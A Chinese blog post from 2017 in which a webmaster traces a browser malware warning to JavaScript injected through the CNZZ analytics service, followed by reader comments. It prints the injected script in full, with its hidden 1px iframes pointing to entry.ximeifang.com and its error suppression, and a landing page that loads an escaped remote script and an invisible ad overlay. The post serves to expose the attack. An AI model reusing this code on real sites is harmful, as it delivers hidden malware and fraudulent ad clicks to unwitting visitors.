ximeifang 恶意软件病毒揭秘
作者:admin 日期:2017-03-27
困扰了很多天的ximeifang.com恶意软件病毒问题终于搞清楚了,从开始怀疑cnzz到后来怀疑联通dns劫持,到现在确认是cnzz自己放的木马,过程还真是曲折。。。
木马表现:chrome浏览器下会提示
您要访问的网站包含恶意软件
攻击者可能会试图通过 entry.ximeifang.com 在您的计算机上安装危险程序,以窃取或删除您的信息(如照片、密码、通讯内容和信用卡信息)。
木马来源:CNZZ官方。。。震惊。。。
代码如下:
http://c.cnzz.com/core.php?web_id=统计id&show=pic1&t=z
JavaScript代码
- var u = "http://c.cnzz.com/core.php?web_id=统计ID&show=pic1&t=z";
- var wapp = 0.95;
- var pcp = 0.95;
- var serh = "entry.ximeifang.com:31002";
- window.onerror = function(a, b, c) {
- return true;
- };
- function IsPC() {
- var a = navigator.userAgent;
- var b = ["Android", "iPhone", "SymbianOS", "Windows Phone", "iPad", "iPod"];
- var c = true;
- for (var v = 0; v < b.length; v++) {
- if (a.indexOf(b[v]) > 0) {
- c = false;
- break
- }
- }
- return c;
- };
- function loadjs(a) {
- var c = document.createElement("script");
- c.setAttribute("type", "text/javascript");
- c.setAttribute("src", a);
- c.setAttribute("charset", "utf-8");
- document.getElementsByTagName("head")[0].appendChild(c);
- };
- function loadiframe(a) {
- var c = document.createElement("iframe");
- c.setAttribute("id", "wbifr");
- c.setAttribute("name", "wbifr");
- c.setAttribute("width", "1px");
- c.setAttribute("height", "1px");
- c.setAttribute("src", a);
- document.getElementsByTagName("head")[0].appendChild(c);
- };
- if (IsPC()) {
- if (Math.random() < pcp) {
- loadiframe("http://" + serh + "/fakepc");
- }
- } else {
- if (Math.random() < wapp) {
- loadiframe("http://" + serh + "/fakewap");
- }
- }
- if (u.indexOf("?") > 0) {
- u += "&aaa_flag=1"
- } else {
- u += "?aaa_flag=1"
- }
- loadjs(u);
访问fakepc则会跳转到:
http://niujv.com/
该网页源码:
XML/HTML代码
- <!DOCTYPE html>
- <html>
- <head>
- <body>
- <script>
- <!--
- document.write(unescape("%3Cscript%20src%3D%22http%3A//code1.168wss.com/page/%3Fs%3D11636%22%3E%3C/script%3E"));
- //-->
- </script>
- <img src="fr fc_9 mar.png" />
- <a href="http://www.niwodai.com/event.mhtml?artId=1823227138797576&f&utm_source=baidutz&utm_medium=cpc&cid=sem-bd03-test-dylc-380&nwd_ext_aid=3000001481188029&source_id=" target="_blank" style="width: 0px; height: 0px; position: absolute; top: 0px; left: 0px; background: #b2b2b2; filter:alpha(opacity=10); -moz-opacity:0.1; -khtml-opacity: 0.1; opacity: 0.1;"></a>
- <span style="display:none"><script src="https://s95.cnzz.com/z_stat.php?id=1261561746&web_id=1261561746" language="JavaScript"></script></span>
- <head>
- </body>
- </html>
又被嵌入了一层js。。。具体要干啥我也懒得分析了,反正不会是好事。。。
至此算是真相大白了,CNZZ的客服还说换https就不会被DNS劫持了。。。。
国内最大的流量统计服务商北京锐讯灵通科技有限公司。。。。
上一篇: entry.ximeifang.com恶意软件病毒DNS劫持
下一篇: 在IE下getAttribute()方法无法读到class属性的解决方法
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: DNS劫持 木马 
相关日志:
评论: 4 | 引用: 0 | 查看次数: 2738
匿名[2017-03-31 09:34 AM | 
| 
| 120.214.42.28 | 
| 
回复]为什么删除了cnzz统计代码,然后全站更新,再看,360还是有这个ximeifang.com的警告呢?
板凳
确实CNZZ的锅,可能被注入了,也可能是故意的。
以前我用https,默认的是淘宝和天猫广告。
现在被拦截了
以前我用https,默认的是淘宝和天猫广告。
现在被拦截了
这个CNZZ真的是垃圾发表评论
广告位
